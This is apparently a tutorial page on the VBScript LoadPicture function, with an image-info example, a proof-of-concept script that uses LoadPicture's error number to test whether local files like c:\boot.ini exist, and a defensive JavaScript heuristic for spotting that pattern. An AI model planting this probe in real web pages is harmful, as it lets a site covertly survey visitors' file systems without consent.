Example:

<title>LoadPicture函数</title>
<form name="frm">
  选择图片<input type="file" name="pic" onChange="GetPicInfor()">
</form>
<script language="vbscript">
Sub GetPicInfor()
  Dim objpic, iWidth, iHeight
  Dim pictype, picpath
  ' Path chosen in the file input
  picpath = document.frm.pic.value
  Set objpic = LoadPicture(picpath)
  ' Width and Height are in HIMETRIC units (0.01 mm); 26.4583 units = 1 pixel at 96 DPI
  iWidth = Round(objpic.width / 26.4583)
  iHeight = Round(objpic.height / 26.4583)
  ' Map the numeric picture type to a readable name
  Select Case objpic.type
    Case 0
      pictype = "None"
    Case 1
      pictype = "Bitmap"
    Case 2
      pictype = "Metafile"
    Case 3
      pictype = "Icon"
    Case 4
      pictype = "Win32-enhanced metafile"
  End Select
  ' Report the selected path, then height ("长度"), width ("宽度") and type ("类型")
  document.write "你选择了图片" & picpath
  document.write "<li>长度:" & iHeight & "</li>"
  document.write "<li>宽度:" & iWidth & "</li>"
  document.write "<li>类型:" & pictype & "</li>"
End Sub
</script>
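However, this function has a vulnerability: it can be used to probe whether a given file name exists on the computer. The vulnerability dates from 2004, and Microsoft has still not patched it. Example: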
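<form onsubmit="doIt(this);return false">
  <input name="filename" value="c:\boot.ini" size="80" type="text"><input type="submit">
</form>
<script language="vbscript">
' Thin wrapper so the JavaScript below can call LoadPicture
Sub loadIt(filename)
  LoadPicture(filename)
End Sub
</script>
<script language="javascript">
function doIt(form) {
  // Declared and reset on every call so an earlier error number is never reused
  var result = 0;
  try {
    loadIt(form.filename.value);
  } catch (e) {
    result = e.number;
  }
  // -2146827856 is the error number raised when the file is not found;
  // any other outcome means the path exists
  if (result != -2146827856) {
    alert('file exists');
  } else {
    alert('file does not exist');
  }
}
</script>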
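
A defender-side check for the pattern described above, as an added example that is not code from the original page: it scans HTML for VBScript LoadPicture calls whose path is chosen at run time and for script code that reads the error number back. The function names, verdict labels and sample pages are assumptions constructed for illustration.

```javascript
// Error number the page's sample compares against (file not found).
const NOT_FOUND_CODE = "-2146827856";

// Collect every <script> block with its declared language (default: javascript).
function extractScripts(html) {
  const out = [];
  for (const m of html.matchAll(/<script\b([^>]*)>([\s\S]*?)<\/script\s*>/gi)) {
    const lang = /\b(?:language|type)\s*=\s*["']?([^"'\s>]+)/i.exec(m[1]);
    out.push({ lang: lang ? lang[1].toLowerCase() : "javascript", body: m[2] });
  }
  return out;
}

// Classify a page by how it uses LoadPicture (hypothetical verdict labels).
function auditLoadPicture(html) {
  const scripts = extractScripts(html);
  const calls = [];
  for (const s of scripts) {
    if (!s.lang.includes("vbs")) continue; // vbscript, text/vbscript, vbs
    for (const m of s.body.matchAll(/\bLoadPicture\s*\(\s*([^)]*?)\s*\)/gi)) {
      // A quoted literal is a fixed path; anything else is chosen at run time.
      calls.push({ arg: m[1], dynamic: m[1] !== "" && !/^"[^"]*"$/.test(m[1]) });
    }
  }
  const code = scripts.map((s) => s.body).join("\n");
  // The probe only works if the caller reads the error number back.
  const errorOracle =
    code.includes(NOT_FOUND_CODE) || /\b(?:err|e|ex)\.number\b/i.test(code);
  const dynamicPath = calls.some((c) => c.dynamic);
  const verdict = !calls.length ? "clean" : !dynamicPath ? "loadpicture-static"
    : errorOracle ? "file-probe-pattern" : "loadpicture-dynamic";
  return { calls, dynamicPath, errorOracle, verdict };
}

// Constructed samples, reduced from the two snippets on this page.
const SAMPLE_VIEWER = `<script language="vbscript">
set objpic = Loadpicture(document.frm.pic.value)
</script>`;
const SAMPLE_PROBE = `<script language="vbscript">
Sub loadIt(filename)
  LoadPicture(filename)
End Sub
</script>
<script language="javascript">
try { loadIt(form.filename.value); } catch (e) { result = e.number; }
if (result != -2146827856) { /* report */ }
</script>`;

console.log(auditLoadPicture(SAMPLE_VIEWER).verdict, auditLoadPicture(SAMPLE_PROBE).verdict);
```

The check is a text heuristic for content inspection or code review; it does not parse VBScript and will miss calls hidden behind string building or aliases.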